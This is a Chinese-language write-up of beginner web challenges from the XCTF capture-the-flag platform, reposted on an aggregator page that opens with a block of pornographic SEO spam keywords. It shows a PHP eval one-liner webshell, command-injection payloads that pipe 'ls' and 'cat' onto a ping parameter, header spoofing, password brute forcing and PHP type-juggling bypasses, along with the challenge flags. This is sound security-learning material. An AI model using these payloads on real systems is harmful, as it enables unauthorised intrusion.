日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問(wèn) 生活随笔!

生活随笔

當(dāng)前位置: 首頁(yè) > 人文社科 > 生活经验 >内容正文

生活经验

2019攻防世界web新手区

發(fā)布時(shí)間:2023/11/27 生活经验 36 豆豆
生活随笔 收集整理的這篇文章主要介紹了 2019攻防世界web新手区 小編覺(jué)得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.

robots

看了題目描述,發(fā)現(xiàn)與robots協(xié)議有關(guān),過(guò)完去百度robots協(xié)議。發(fā)現(xiàn)了robots.txt,然后去構(gòu)造url訪問(wèn)這個(gè)文件
?http://111.198.29.45:42287/robots.txt
得到提示:Disallow: f1ag_1s_h3re.php,再次構(gòu)造url,訪問(wèn)這個(gè)文件。

http://111.198.29.45:42287/f1ag_1s_h3re.php
成功得到flag:cyberpeace{bffdd8b6fd5db04fd274822c68d5fadb}


backup

進(jìn)去題目后,看到提示與index.php的備份文件有關(guān),想起index.php.bak,果斷構(gòu)造url訪問(wèn)文件。
?111.198.29.45:58119/index.php.bak
下載文件后,使用記事本打開(kāi),即可得到flag:cyberpeace{d7646fa539c6b115deef155a73830462}


cookie
看到題目和cookie有關(guān),果斷按下F12查看cookie,發(fā)現(xiàn)了cookie.php,構(gòu)造url去訪問(wèn)
http://111.198.29.45:33679/cookie.php
得到提示:See the http response
然后再網(wǎng)絡(luò)請(qǐng)求的消息頭里面看到的flag:cyberpeace{2c2587a68a1db6c2a413631531030da1}

?

disabled button

看到一個(gè)flag按鈕,但卻無(wú)法點(diǎn)擊。覺(jué)得應(yīng)該和參數(shù)的設(shè)置有關(guān),F12改下參數(shù),把下面位置的disabled更改為able,

再次點(diǎn)擊flag按鈕,即可獲得flag:cyberpeace{0ca54cb222b4d649d8e193467f5c8f52}

?

simple js

看題目覺(jué)得這應(yīng)該是一道關(guān)于js的題目,因?yàn)闆](méi)怎么學(xué)過(guò)js,心里小發(fā)慌。查看網(wǎng)頁(yè)源代碼。

其中pass為假密碼,可以看到無(wú)論輸入什么都會(huì)返回這個(gè)假密碼,真正的密碼在:javascript String"fromCharCode"; - 用python處理一下:

s="\x35\x35\x2c\x35\x36\x2c\x35\x34\x2c\x37\x39\x2c\x31\x31\x35\x2c\x36\x39\x2c\x31\x31\x34\x2c\x31\x31\x36\x2c\x31\x30\x37\x2c\x34\x39\x2c\x35\x30"

print (s) - 得到` 55,56,54,79,115,69,114,116,107,49,50

s=[55,56,54,79,115,69,114,116,107,49,50]

for i in s:

print(chr(i),end='')

- 得到?786OsErtk12

?

?

xff referer:

看到題目覺(jué)得應(yīng)該和XFF有關(guān),進(jìn)去后要求IP地址必須為123.123.123.123,使用burpsuite偽造XFF:X-Forwarded-For:123.123.123.123

go之后又要求innerHTML="必須來(lái)自https://www.google.com",再偽造Referer:Referer:https://www.google.com

go之后得到flag:cyberpeace{e9f742dcdb07a05638f0c004c4a27368}

?

weak auth:

進(jìn)入后看到一個(gè)登陸框界面,試著隨便輸入一個(gè)賬戶(hù)密碼,提示輸入admin,然后再源碼里發(fā)現(xiàn)“./check.php”,點(diǎn)進(jìn)去發(fā)現(xiàn)提示:maybe you need a dictionary,利用burpsuite選擇一個(gè)字典進(jìn)行爆破。爆破出密碼為123465.

輸入正確密碼得到flag:cyberpeace{5469437256d685fbb6ba239b163bd400}

?

webshell

題目描述給出了php一句話的提示,進(jìn)去題目后看到了<?php @eval($_POST['shell']);?>

發(fā)現(xiàn)連接密碼為“shell”,用菜刀連接,發(fā)現(xiàn)flag.txt文件,里面包含flag。

?

?

command execution

這個(gè)題需要了解一些命令執(zhí)行的知識(shí):windows或linux下: command1 && command2 先執(zhí)行command1后執(zhí)行command2 command1 | command2 只執(zhí)行command2 command1 & command2 先執(zhí)行command2后執(zhí)行command1

我們先在ping的輸入框里隨便輸入一個(gè)地址,比如127.0.0.1,然后打開(kāi)hackbar,發(fā)現(xiàn)它是通過(guò)target參數(shù)以post的方式提交的,我們構(gòu)造target參數(shù)的值:

首先構(gòu)造這個(gè)命令:target=127.0.0.1 | ls ../../../home,提交后會(huì)執(zhí)行后面的“l(fā)s ../../../home”命令,發(fā)現(xiàn)含有flag.txt文件

然后我們構(gòu)造查看home下flag.txt文件內(nèi)容的命令:target=127.0.0.1 | cat ../../../home/flag.txt,即可輸出flag:

simple php

一道代碼審計(jì)的題,用到了知識(shí)點(diǎn),一個(gè)是php弱等于,一個(gè)是%00截?cái)唷O瓤创a

<?php
show_source(__FILE__);
include("config.php");
$a=@$_GET['a'];    //get方式提交一個(gè)a
$b=@$_GET['b'];    //get方式提交一個(gè)b
if($a==0 and $a){    //如果a滿(mǎn)足條件,數(shù)組flag的前一部分echo $flag1;
}
if(is_numeric($b)){exit();
}
if($b>1234){    //如果b滿(mǎn)足條件,輸入flag的后一部分echo $flag2;
}
?> 

?

在判斷語(yǔ)句里,要求a==0,并且a不為0;看到兩個(gè)等號(hào),想到php弱等于,這里可以讓a=admin,在“==”判斷是,admin會(huì)被轉(zhuǎn)換成“0”,a滿(mǎn)足天劍

然后是b,is_numeric這個(gè)函數(shù)要求b不能是數(shù)字,下面要求b大于1234,這里可以讓b=2345%00,%00是空格的意思,這樣b就不會(huì)被判斷為數(shù)字,且大于1234,b滿(mǎn)足條件。

構(gòu)造url:http://111.198.29.45:40060/?a=admin&b=2345%00,即可得到flag。

對(duì)于is_numeric這個(gè)函數(shù)的繞過(guò),還可以讓b=2345a。即在后面加一個(gè)字母也可以。

?(ps:本人太菜,若有錯(cuò)誤的地方歡迎大佬隨時(shí)責(zé)罵。。。。xixixii)

轉(zhuǎn)載于:https://www.cnblogs.com/liangxiyang/p/10949243.html

總結(jié)

以上是生活随笔為你收集整理的2019攻防世界web新手区的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò),歡迎將生活随笔推薦給好友。